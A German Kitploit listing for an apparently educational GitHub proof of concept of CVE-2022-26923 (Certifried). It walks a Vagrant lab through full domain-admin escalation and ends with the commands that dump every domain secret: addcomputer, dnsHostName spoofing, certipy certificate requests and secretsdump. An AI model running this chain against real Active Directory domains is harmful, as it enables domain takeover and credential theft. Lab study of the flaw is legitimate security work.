Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-26923 — Ein Proof of Concept, der CVE-2022-26923 ausnutzt. | Kitploit
Tools/GitHubGitHub/gh-badr/cve-2022-26923
Privilege EscalationExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubgh-badr/cve-2022-26923

CVE-2022-26923

Ein Proof of Concept, der CVE-2022-26923 ausnutzt.

Repository anzeigen
221vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-26923

Beschreibung

Diese Sicherheitslücke erlaubte es einem Benutzer mit niedrigen Berechtigungen, seine Berechtigungen auf Domänenadministrator in einer Standard-Active-Directory-Umgebung mit installierter Active Directory Certificate Services (AD CS) Serverrolle zu erhöhen.

Sie steht hauptsächlich im Zusammenhang mit der Active Directory Certificate Services (AD CS) Rolle. Die AD CS Rolle ist eine Windows Server Rolle, mit der Sie eine Public-Key-Infrastruktur (PKI) aufbauen und Public-Key-Kryptographie, digitale Zertifikate und digitale Signaturfunktionen für Ihre Organisation bereitstellen können. Die AD CS Rolle wird verwendet, um Zertifikate für Benutzer, Computer und Dienste auszustellen.

Inhaltsverzeichnis

  • CVE-2022-26923
    • Beschreibung
    • Inhaltsverzeichnis
    • Voraussetzungen
    • Umgebung
    • Exploit
    • Proof of Concept
    • Referenzen

Voraussetzungen

  • Vagrant
  • VirtualBox

Umgebung

Die verwendete Windows Server Version ist Windows Server 2019 Standard Evaluation, die anfällige Version. Die bereitgestellte Vagrantfile (im Ordner Vulnerable Machine) erstellt eine Windows Server 2019 VM mit installierter und konfigurierter AD CS Rolle sowie einem Benutzer mit niedrigen Berechtigungen mit folgenden Anmeldeinformationen:

  • Benutzername: user
  • Passwort: V@grant1

Um die Umgebung zu erstellen, führen Sie die folgenden Schritte aus:

  • Klonen Sie zuerst das Repository und wechseln Sie in das Verzeichnis CVE-2022-26923:
    git clone https://github.com/Gh-Badr/CVE-2022-26923
    cd CVE-2022-26923
    
  • Falls Sie die Standard-IP-Adresse ändern müssen, können Sie dies in der Vagrantfile tun, indem Sie die IP-Adresse in der folgenden Zeile ersetzen:
    config.vm.network "private_network", type: "static", ip: "192.168.33.13"
    
  • Führen Sie dann den folgenden Befehl aus, um die VM zu erstellen:
    cd 'Vulnerable Machine'
    vagrant up
    
  • Falls Sie keine Linux-Maschine mit installiertem certipy haben, können Sie die bereitgestellte Vagrant-Maschine im Verzeichnis Attacker Machine verwenden, indem Sie den folgenden Befehl ausführen:
    cd 'Attacker Machine'
    vagrant up
    

Der Ordner Attacker Machine enthält eine Vagrant-Maschine zusammen mit einem Shell-Skript, das die neueste Version von certipy installiert. Sie können das Skript auch verwenden, um certipy auf Ihrer Linux-Maschine zu installieren.

Exploit

Um eine Verbindung zur Angreifer-Maschine herzustellen, führen Sie den folgenden Befehl aus dem Verzeichnis Attacker Machine aus:

vagrant ssh

Jetzt, da Sie sich auf der Angreifer-Maschine befinden, müssen Sie die IP-Adresse des Windows Servers zur hosts-Datei hinzufügen:

echo "192.168.33.13   VAGRANT-K51B6U3.vagrant.local VAGRANT-K51B6U3 vagrant-VAGRANT-K51B6U3-CA vagrant.local" | sudo tee -a /etc/hosts

Hinweis: Wenn Sie die IP-Adresse in der Vagrantfile der anfälligen Maschine geändert haben, müssen Sie sie auch hier ändern.

Erstellen wir dann ein neues Computerkonto in der Domäne:

addcomputer.py 'vagrant.local/user:V@grant1' -method LDAPS -computer-name 'CVEPC' -computer-pass 'P@ssw0rd'

Um zu überprüfen, ob das Computerkonto erstellt wurde, verbinden Sie sich mit der anfälligen Maschine mit dem Benutzer user und dem Passwort V@grant1, indem Sie den folgenden Befehl aus dem Verzeichnis Vulnerable Machine ausführen:

vagrant ssh

Führen Sie dann den folgenden Befehl aus, um zu überprüfen, ob das Computerkonto erstellt wurde:

Get-ADComputer CVEPC -Properties dnsHostName,servicePrincipalName

Dieses Maschinenkonto hat den dnsHostName CVEPC.vagrant.local. Wir möchten diesen dnsHostName in VAGRANT-K51B6U3.vagrant.local ändern, den Domain Controller.

Dazu müssen wir zuerst den Service Principal Name (SPN) vom Computerkonto CVEPC löschen, indem wir den folgenden Befehl ausführen:

Set-ADComputer CVEPC -Properties ServicePrincipalName @{}

Dann können wir den dnsHostName in VAGRANT-K51B6U3.vagrant.local ändern, indem wir den folgenden Befehl ausführen:

Set-ADComputer CVEPC -Properties dnsHostName VAGRANT-K51B6U3.vagrant.local
  • Hinweis: Um zu verstehen, warum wir den SPN des Computerkontos löschen mussten, können Sie auf das Projekt Report (auf Französisch) verweisen. Oder Sie können den ersten Artikel im Referenzabschnitt überprüfen, der eine detaillierte Erklärung des Autors der CVE enthält.

Jetzt, da wir ein Computerkonto mit dem dnsHostName VAGRANT-K51B6U3.vagrant.local haben, können wir ein bösartiges Zertifikat von der anfälligen Maschine anfordern, indem wir den folgenden Befehl auf der Angreifer-Maschine ausführen:

certipy req -username '[email protected]' -password 'P@sww0rd' -ca vagrant-VAGRANT-K51B6U3-CA -template Machine -target VAGRANT-K51B6U3.vagrant.local

Sie sollten ein Zertifikat namens vagrant-k51b6u3.pfx im aktuellen Verzeichnis erhalten. Um zu überprüfen, ob das Zertifikat gültig ist, verwenden Sie das auth-Tool von certipy, indem Sie den folgenden Befehl ausführen:

certipy auth -pfx vagrant-k51b6u3.pfx

Wenn das Zertifikat gültig ist, sollten Sie den NTLM-Hash des Domain Controllers erhalten. Dieser kann auf viele bösartige Weisen verwendet werden.

Proof of Concept

Als Proof of Concept können wir den NTLM-Hash verwenden, um alle in der Domäne gespeicherten Geheimnisse abzurufen (wie im Artikel des Autors der CVE beschrieben). Dazu können wir das Tool secretsdump.py aus der Impacket-Suite verwenden (die mit der neuesten Version von certipy installiert wird).

Um das Tool zu verwenden, führen Sie den folgenden Befehl aus:

secretsdump.py 'vagrant.local/[email protected]' -hashes :<NTLM hash>

Ersetzen Sie <NTLM hash> durch den NTLM-Hash, den Sie im vorherigen Schritt erhalten haben.

Als Ergebnis sollten Sie alle in der Domäne gespeicherten Geheimnisse erhalten.

Referenzen

  • Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)
  • GitHub - LudovicPatho/CVE-2022-26923_AD-Certificate-Services
  • Try Hack Me - CVE-2022-26923
Tool herunterladen